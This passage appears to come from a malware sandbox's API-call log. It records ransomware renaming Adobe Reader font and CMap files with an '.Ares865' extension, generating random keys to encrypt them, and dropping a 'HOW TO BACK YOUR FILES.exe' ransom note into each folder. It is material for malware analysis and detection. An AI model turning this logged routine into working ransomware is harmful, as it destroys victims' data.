dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.002] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.002] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.004] lstrcpyW (in: lpString1=0x2cce46e, lpString2="MyriadPro-It.otf" | out: lpString1="MyriadPro-It.otf") returned="MyriadPro-It.otf" [0161.004] lstrlenW (lpString="MyriadPro-It.otf") returned 16 [0161.004] lstrlenW (lpString="Ares865") returned 7 [0161.004] lstrcmpiW (lpString1="-It.otf", lpString2="Ares865") returned 1 [0161.004] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-It.otf.Ares865") returned 79 [0161.004] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-It.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-it.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-It.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-it.otf.ares865"), dwFlags=0x1) returned 1 [0161.017] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-It.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-it.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.017] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=98064) returned 1 [0161.017] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.018] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.018] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.026] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.027] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.027] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.028] lstrcpyW (in: lpString1=0x2cce46e, lpString2="MyriadPro-Regular.otf" | out: lpString1="MyriadPro-Regular.otf") returned="MyriadPro-Regular.otf" [0161.028] lstrlenW (lpString="MyriadPro-Regular.otf") returned 21 [0161.028] lstrlenW (lpString="Ares865") returned 7 [0161.028] lstrcmpiW (lpString1="lar.otf", lpString2="Ares865") returned 1 [0161.029] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Regular.otf.Ares865") returned 84 [0161.029] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Regular.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-regular.otf"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-regular.otf.ares865"), dwFlags=0x1) returned 1 [0161.031] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\MyriadPro-Regular.otf.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\myriadpro-regular.otf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.031] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=94360) returned 1 [0161.031] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.032] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.032] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.039] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.039] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.039] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.041] lstrcpyW (in: lpString1=0x2cce46e, lpString2="PFM" | out: lpString1="PFM") returned="PFM" [0161.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7948 [0161.041] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x76) returned 0x2c1788 [0161.041] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7950 | out: ListHead=0x2e7710, ListEntry=0x2e7950) returned 0x2e7930 [0161.041] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f57cca0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x8791, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SY______.PFB", cAlternateFileName="")) returned 1 [0161.041] lstrcmpiW (lpString1="SY______.PFB", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0161.041] lstrcmpiW (lpString1="SY______.PFB", lpString2="aoldtz.exe") returned 1 [0161.042] lstrcpyW (in: lpString1=0x2cce46e, lpString2="SY______.PFB" | out: lpString1="SY______.PFB") returned="SY______.PFB" [0161.042] lstrlenW (lpString="SY______.PFB") returned 12 [0161.042] lstrlenW (lpString="Ares865") returned 7 [0161.042] lstrcmpiW (lpString1="___.PFB", lpString2="Ares865") returned -1 [0161.042] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\SY______.PFB.Ares865") returned 75 [0161.042] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\SY______.PFB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\sy______.pfb"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\SY______.PFB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\sy______.pfb.ares865"), dwFlags=0x1) returned 1 [0161.044] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\SY______.PFB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\sy______.pfb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.044] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=34705) returned 1 [0161.044] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.045] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.045] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.048] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.049] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.049] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.050] lstrcpyW (in: lpString1=0x2cce46e, lpString2="ZX______.PFB" | out: lpString1="ZX______.PFB") returned="ZX______.PFB" [0161.050] lstrlenW (lpString="ZX______.PFB") returned 12 [0161.050] lstrlenW (lpString="Ares865") returned 7 [0161.050] lstrcmpiW (lpString1="___.PFB", lpString2="Ares865") returned -1 [0161.050] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZX______.PFB.Ares865") returned 75 [0161.050] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZX______.PFB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zx______.pfb"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZX______.PFB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zx______.pfb.ares865"), dwFlags=0x1) returned 1 [0161.053] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZX______.PFB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zx______.pfb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.053] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=75573) returned 1 [0161.053] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.054] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.054] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.060] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.060] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.060] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.062] lstrcpyW (in: lpString1=0x2cce46e, lpString2="ZY______.PFB" | out: lpString1="ZY______.PFB") returned="ZY______.PFB" [0161.062] lstrlenW (lpString="ZY______.PFB") returned 12 [0161.062] lstrlenW (lpString="Ares865") returned 7 [0161.062] lstrcmpiW (lpString1="___.PFB", lpString2="Ares865") returned -1 [0161.062] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZY______.PFB.Ares865") returned 75 [0161.062] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZY______.PFB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zy______.pfb"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZY______.PFB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zy______.pfb.ares865"), dwFlags=0x1) returned 1 [0161.064] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\ZY______.PFB.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\zy______.pfb.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.064] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=96418) returned 1 [0161.064] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.065] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.065] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.073] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.074] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.074] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.075] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM" [0161.076] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM" [0161.076] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0161.076] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0161.077] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.077] GetLastError () returned 0x0 [0161.077] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0161.077] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f556b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x54673ba0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x54673ba0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0161.078] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0161.078] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0161.078] lstrcpyW (in: lpString1=0x2cce476, lpString2="SY______.PFM" | out: lpString1="SY______.PFM") returned="SY______.PFM" [0161.078] lstrlenW (lpString="SY______.PFM") returned 12 [0161.078] lstrlenW (lpString="Ares865") returned 7 [0161.078] lstrcmpiW (lpString1="___.PFM", lpString2="Ares865") returned -1 [0161.078] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\SY______.PFM.Ares865") returned 79 [0161.078] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\SY______.PFM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\sy______.pfm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\SY______.PFM.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\sy______.pfm.ares865"), dwFlags=0x1) returned 1 [0161.082] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\SY______.PFM.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\sy______.pfm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.082] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=672) returned 1 [0161.082] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.083] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.083] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.086] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.087] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.087] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.087] lstrcpyW (in: lpString1=0x2cce476, lpString2="zx______.pfm" | out: lpString1="zx______.pfm") returned="zx______.pfm" [0161.087] lstrlenW (lpString="zx______.pfm") returned 12 [0161.087] lstrlenW (lpString="Ares865") returned 7 [0161.087] lstrcmpiW (lpString1="___.pfm", lpString2="Ares865") returned -1 [0161.088] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zx______.pfm.Ares865") returned 79 [0161.088] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zx______.pfm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zx______.pfm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zx______.pfm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zx______.pfm.ares865"), dwFlags=0x1) returned 1 [0161.090] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zx______.pfm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zx______.pfm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.090] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=683) returned 1 [0161.090] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.091] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.091] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.094] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.094] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.094] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.095] lstrcpyW (in: lpString1=0x2cce476, lpString2="zy______.pfm" | out: lpString1="zy______.pfm") returned="zy______.pfm" [0161.095] lstrlenW (lpString="zy______.pfm") returned 12 [0161.095] lstrlenW (lpString="Ares865") returned 7 [0161.095] lstrcmpiW (lpString1="___.pfm", lpString2="Ares865") returned -1 [0161.095] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zy______.pfm.Ares865") returned 79 [0161.095] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zy______.pfm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zy______.pfm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zy______.pfm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zy______.pfm.ares865"), dwFlags=0x1) returned 1 [0161.097] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Font\\PFM\\zy______.pfm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\font\\pfm\\zy______.pfm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.098] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=684) returned 1 [0161.098] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.099] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.099] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.101] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.101] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.101] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.102] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap" [0161.102] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap" [0161.102] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0161.102] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\how to back your files.exe"), bFailIfExists=1) returned 0 [0161.111] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.111] GetLastError () returned 0x0 [0161.112] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0161.112] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7f556b40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x800a53c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x800a53c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0161.112] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0161.112] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0161.113] lstrcpyW (in: lpString1=0x2cce46e, lpString2="83pv-RKSJ-H" | out: lpString1="83pv-RKSJ-H") returned="83pv-RKSJ-H" [0161.113] lstrlenW (lpString="83pv-RKSJ-H") returned 11 [0161.113] lstrlenW (lpString="Ares865") returned 7 [0161.113] lstrcmpiW (lpString1="-RKSJ-H", lpString2="Ares865") returned 1 [0161.113] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\83pv-RKSJ-H.Ares865") returned 74 [0161.113] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\83pv-RKSJ-H" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\83pv-rksj-h"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\83pv-RKSJ-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\83pv-rksj-h.ares865"), dwFlags=0x1) returned 1 [0161.116] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\CMap\\83pv-RKSJ-H.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\cmap\\83pv-rksj-h.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0161.116] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7463) returned 1 [0161.116] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0161.117] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0161.117] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.119] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0161.120] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0161.120] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0161.121] lstrcpyW (in: lpString1=0x2cce46e, lpString2="90ms-RKSJ-H" | out: lpString1="90ms-RKSJ-H") returned="90ms-RKSJ-H" [0161.121] lstrlenW (lpString="90ms-RKSJ-H") returned 11 [0161.121] lstrlenW (lpString="Ares865") returned 7 [0161.121] lstrcmpiW (lpString1="-RKSJ-H", lpString2="Ares865") returned 1 [0161.121] wsprintfW (in: param_1=0x2ccd198, 